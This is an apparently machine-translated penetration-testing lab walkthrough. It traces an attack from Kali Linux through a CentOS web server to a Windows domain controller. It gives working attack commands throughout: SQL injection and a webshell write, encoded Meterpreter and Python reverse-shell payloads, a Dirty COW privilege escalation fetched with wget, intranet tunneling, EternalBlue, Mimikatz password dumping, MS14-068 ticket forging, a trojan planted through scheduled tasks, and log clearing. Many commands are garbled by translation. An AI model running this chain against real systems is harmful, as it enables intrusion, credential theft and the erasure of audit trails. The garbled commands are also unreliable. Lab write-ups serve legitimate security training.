The topological environment

  1. Kali Linux (Attack Aircraft)
  2. Centos6.4 (web server)
  3. Win7 (Domain member hosts cannot access the Internet)
  4. Win2008R2 (The domain controller cannot access the Internet)

purpose

Obtain domain control rights through Kali Linux

2021 Latest collation network security penetration testing/security learning (full set of video, big factory face classics, boutique manual, essential kit) a > point I < a

Web penetration

Directory scanning

Using dirbuster tool scans web root directory setup kali the default dictionary file/usr/share/wordlists/dirbuster/directorylistlowercase2.3 small. TXT

Scan to get phpinfo.php

Get the absolute path information for the site

An SQL query error occurs

Through the test, errors are found in SQL integer injection, and the Webshell is further obtained

SQL injection

SQL injection is found by sqlMap test

Sqlmap ‐ u "http://IP:8888/newsshow.php? Cid = 4 & id = 19 * "‐ ‐ DBMS MYSQL ‐ v3

Get webshell

Where there is an absolute path, you can write directly to the Webshell. Sqlmap osshell functions are used here

sqlmap(os­shell)

Sqlmap ‐u “http://IP/newsshow.php? Cid = 4&ID =19*” ‐ DBMS MYSQL ‐ V3 ‐ OS ‐ shell

Write directly webshell (pass)

http://IP/newsshow.php?cid=4&id=19 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,0 x3c3f706870206576616c28245f504f53545b2770617373275d29 3 f3e, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile '/ var/WWW/HTML/webshell. PHP'

Rebound in the shell

To facilitate subsequent operations, bounce the shell

Obtain target system information

OS ‐shell> uname ‐a OS ‐shell> whereis python ‘

Gets the Meterpreter session

Since Python is installed on the site by default for Linux, python bounce scripts can be generated directly

# generate rebound python scripts msfvenom ‐ p python/meterpreter reverse_tcp LHOST = IP LPORT = 4444 ‐ f # raw MSF listening session msfconsole use reverse connection Exploits/multi/handler set IP payload python/meterpreter reverse_tcp set LHOST set LPORT monitored fast start cat # 4444 run MSF Py_reverse_tcp. Rc use exploits/multi/handler set payload python/meterpreter/reverse_tcp set LHOST 192.168.0.17 set LPORT 4444

Exploits msfconsole ‐ r py_reverse_tcp. Rc

Execute the Python Meterpreter bounce script in SQLMAP OS ‐shell mode

OS ‐shell> python ‐c "import base64,sys; The exec (base64. B64decode ({2: STR, 3: lambda b: bytes (b, 'UTF 8 ‐')} [sys. Version_info [0]] ('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQ0KZm9yIHggaW4gcmFuZ2UoMTApOg0KCXRy eToNCgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KCQlzLmNvbm 5lY3QoKCYjMzk7SVAmIzM5Oyw0NDQ0KSkNCgkJYnJlYWsNCglleGNlcHQ6DQoJCXRpbWUu c2xlZXAoNSkNCmw9c3RydWN0LnVucGFjaygmIzM5OyZndDtJJiMzOTsscy5yZWN2KDQpKV swXQ0KZD1zLnJlY3YobCkNCndoaWxlIGxlbihkKSZsdDtsOg0KCWQrPXMucmVjdihsLWxl bihkKSkNCmV4ZWMoZCx7JiMzOTtzJiMzOTs6c30pDQo=')))"Copy the code

Nc + python rebound

#kali listens on the session

root@kali:~# nc ‐ LVVP 6666 # OS ‐shell> python ‐c "import OS; import pty; import socket; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((' IP',6666)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.filen o(),2); os.putenv('HISTFILE','/dev/null'); pty.spawn('/bin/bash'); s.clos e();" `Copy the code

Sqlmap executed:

Listening port bounces back shell result:

Right to mention

Once you get the shell, try to upgrade your permissions

View the current kernel version

Run the uname a command to obtain the current system kernel version

Use known vulnerabilities to claim rights

Download the corresponding lifting program according to known kernel vulnerabilities (where dirty cow kernel lifting is used)

CD/TMP/wget ‐ ‐ no ‐ check ‐ certificate https://raw.githubusercontent.com/K3vinPlus/sundry/master/DirtyCow/dir ty. The GCC c ‐pthread dirty. C ‐o dirty ‐lcrypt./dirty 123456

Obtain the Firefart user as root

su firefart

After the user is changed to Firefart, restore the passwd function so that the root user cannot use it

mv /tmp/passwd.bak /etc/passwd

Horizontal infiltration

You can view the network adapter information and find the Intranet address information

Network agent

Meterpreter Automatic Routing (preferred)

‐s 10.0.0.1/24 meterpreter > run autoroute ‐p

reGeorg+proxychains

Because the second network adapter of the Web server cannot access the Internet, you need to perform Intranet proxy

In the shell of the Web server, download the tunnel.nosocket. PHP file to perform proxy traffic

1, network download wget ‐ ‐ no ‐ check ‐ certificate https://raw.githubusercontent.com/K3vinPlus/reGeorg/master/tunnel.noso cket. PHP mv Tunnel. Nosocket. PHP/var/WWW/HTML / 2, local upload upload/root/reGeorg/tunnel nosocket. PHP/var/WWW/HTML

The tunnel.nosocket. PHP file can be accessed normally

[

Execute the reGeorg proxy script on Kali

Python reGeorgSocksProxy. Py 9999 ‐ ‐ p u http://IP:8888/tunnel.nosocket.php

Modify proxyChains configuration file, add socks information in the last line.

Vim /etc/proxychains. Conf socks5 127.0.0.1 9999

## MSF built-in proxy Settings

Setg Proxies socks5:127.0.0.1:9999

Scanning Intranet Assets

Port scanning

MSF port scanning module detects that 10.0.1.9 and 10.0.1.254 have ports 445 and 3389.

The use of auxiliary/scanner/portscan/TCP set RHOSTS 10.0.1.1/24 set PORTS 21,22,23,80,389,445,873,1433,1521,2049,2181,2375,3306,3389,4899,5432,5 631590 0593 8598 4637 9800 0808 0700 1908 0920 0100 51112 11208 80270 17500 70 10 exploits set THREADS

10.0.1.9 IP Port Opening Status

10.0.1.254 IP Port Opening Status

MS17010 Vulnerability host scanning

In proxy mode, use MSF framework to scan hosts with MS17010 vulnerability in the network segment

Root @ kali: ~ # proxychains msfconsole use auxiliary/scanner/SMB/smb_ms17_010 set RHOST 10.0.1.0 ‐ 254 10 exploits set threads

MS17010 vulnerability utilization

Through meterpreter routing, background attacks using MS17010 attack module

Use exploits/Windows/SMB/ms17_010_eternalblue set content/x64 meterpreter/bind_tcp set RHOSTS 10.0.1.9 run

Penetration of

Information collection

View the information about the current host

meterpreter > sysinfo

Get the current domain

Use Mimikatz to get the password

Load the Mimikatz module

Meterpreter > load mimikatz # Load the plaintext information of the account password stored in the memory meterpreter > wdigest

Obtain the domain account SID

meterpreter > run post/windows/gather/enum_logged_on_users

Domain control positioning

net group "domain controllers" /domain ping dc1.kevin.com

MS14­068

Python scripts generate tickets

Ms14 ‐068.py u [email protected] ‐ S s ‐1‐5‐21‐ 4289546598‐4075965387‐827630551‐1111 ‐ D 10.0.1.254 ‐ p Kevin @ 123

The MSF module generates tickets

use auxiliary/admin/kerberos/ms14_068_kerberos_checksum set DOMAIN KEVIN.com set USER liujiafeng set PASSWORD kevin@123 set USER_SID S‐1‐5‐21‐4289546598‐4075965387‐827630551‐1111 set RHOST 10.0.1.254

Generate kirbi files locally

Copy ms14‐068 bin ticket to loot /root/.msf4/loot/ 20191223050146 _default_10 0.1.254 _windows. Kerberos_122860. Bin/export

Kirbi into ccache

# Change the kirbi file to ccache Python ticket_Converter 0 00000000 ‐ ‐ liujiafeng @ KRBTGT ‐ KEVIN.COM.kirbi [email protected] [email protected] mv /root/pykek/

Generate forward connection MSF test.exe Trojan

Generate MSF listening port program

Msfvenom ‐ p Windows/x64 meterpreter/bind_tcp LHOST = 10.0.1.254 LPORT = 4444 ‐ ‐ o f exe/root/pykek/test. Exe

Create an MSF session to listen for the forward connection payload

Use exploits/multi/handler set content Windows/x64 meterpreter/bind_tcp set RHOST 10.0.1.254

Upload utilization tool

Upload tools, MS14086 gold note to win7 springboard

upload /root/pykek/[email protected] C:/users/kevin upload The/usr/share/Windows ‐ resources/mimikatz/x64 / mimikatz. Exe C: / Users/Kevin upload/root/pykek/test. The exe C: / Users/Kevin shell

Import bill

Execute on win7 springboard

‘klist purge # purge

cd c:/users/kevin
mimikatz.exe
kerberos::ptc [email protected]
Copy the code

Copy the Trojan horse to the domain controller

Copy the test.exe to disk C of the domain controller through the Windows 7 board jumper, and run the AT command to add scheduled tasks and execute the test.exe

`copy test.exe \dc1.kevin.com\c$ dir \dc1.kevin.com\c<pre class=”copy-codeblocks” style=”font-family: Consolas, Menlo, Monaco, “Lucida Console”, “Liberation Mono”, “DejaVu Sans Mono”, “Bitstream Vera Sans Mono”, “Courier New”, monospace; The font – size: 15.008 px; display: block; position: relative; overflow: visible; color: rgb(34, 34, 34); font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;”

Add an AT scheduled task execution Trojan horse to the domain controller

net time \\dc1.kevin.com at \\dc1.kevin.com 15:42:00 c:\test.exe

View the AT scheduled task of the current domain controller

at \\dc1.kevin.com

After the scheduled task of the DOMAIN controller at is executed, connect to port 4444 of the domain controller

Netstat ‐ ano | findstr searches "4444"

All obtained Meterpreter sessions

Remove traces

End the MSF Trojan and delete the EXE process

at \\dc1.kevin.com 16:23:00 cmd /c del c:\test.exe

Delete Windows 7 tools

cd c:/users/kevin rm [email protected] rm mimikatz.exe

Windows Deletes system logs

clearev